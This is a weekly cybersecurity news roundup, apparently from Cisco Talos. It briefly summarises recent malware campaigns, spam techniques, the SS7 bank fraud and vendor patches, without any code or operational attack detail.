Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.
Top headlines this week
- Attackers continue to utilize a security hole in GoDaddy.com domains. The flaw allows unauthenticated users to send malicious emails via legitimate, dormant domains. Most recently, a group of attackers sent out a series of sextortion and bomb threat emails, as outlined in a report by Cisco Talos. GoDaddy is the world’s largest domain name registrar.
- Email spammers are taking advantage of a little-known Gmail feature that allows them to grow their reach. They can create so-called “dot emails,” which places a period between each letter in their domain name. If the attackers are able to use a seemingly legitimate domain, they can then add dots to that domain and still control the emails, allowing them to send out more spam.
- Facebook is stepping up its crackdown on fake accounts. The social media site took down thousands of pages and profiles posting malicious content. The pages originated from Iran and Indonesia. Earlier this month, it also removed Russian- and Philipino-backed, politically motivated pages.
From Talos
- An evolution of the LuckyCat malware, known as “ExileRAT,” is targeting Tibetan users. Talos recently discovered an email campaign that sent malicious documents to members of a mailing list related to the Tibetan government-in-exile. Based on the malware’s capabilities, it’s believed the attackers aim to spy on their victims.
- Cryptocurrency miners, trojans lead malware in 2018. Talos this week published a roundup of the SNORT® rules that triggered the most last year. Rules that helped protect users against miners and trojans were among the most used.
Malware roundup
- A new backdoor is targeting Linux systems. Known as “SpeakUp,” the remote access trojan allows attackers to gain boot persistence by modifying the local cron utility, run shell commands and execute downloaded files.
- Banking customers in the U.K. fell victim to SS7 attacks that drained their accounts. Attackers were able to exploit SS7 to intercept users’ phone calls and text messages, eventually being able to steal banking credentials. The U.K.’s Metro Bank was specifically targeted in the most recent campaign.
- New variants of DanaBot are targeting users in Europe. Machines already infected with DanaBot received disguised “updates” with the new variants, and attackers also sent out malspam to Polish users. These versions use a different command and control communication method than the original version from 2018.
The rest of the news
- Mozilla is working on a new feature for Firefox to protect against side-channel attacks. The new tool aims to be an improved version of Google Chrome’s Site Isolation feature, which helps browsers block potential side-channel attacks.
- The U.S. Department of Justice and Department of Homeland Security completed an election security report. The study, ordered by the White House, looks at whether the 2018 midterm elections were influenced by foreign interference. It’s unclear whether the report will ever be made public.
- Google patched a critical vulnerability in Android devices as part of its February security update. Attackers could use a specially crafted PNG image to completely take over the victim’s mobile device. Google says there’s no evidence of the bug being exploited in the wild.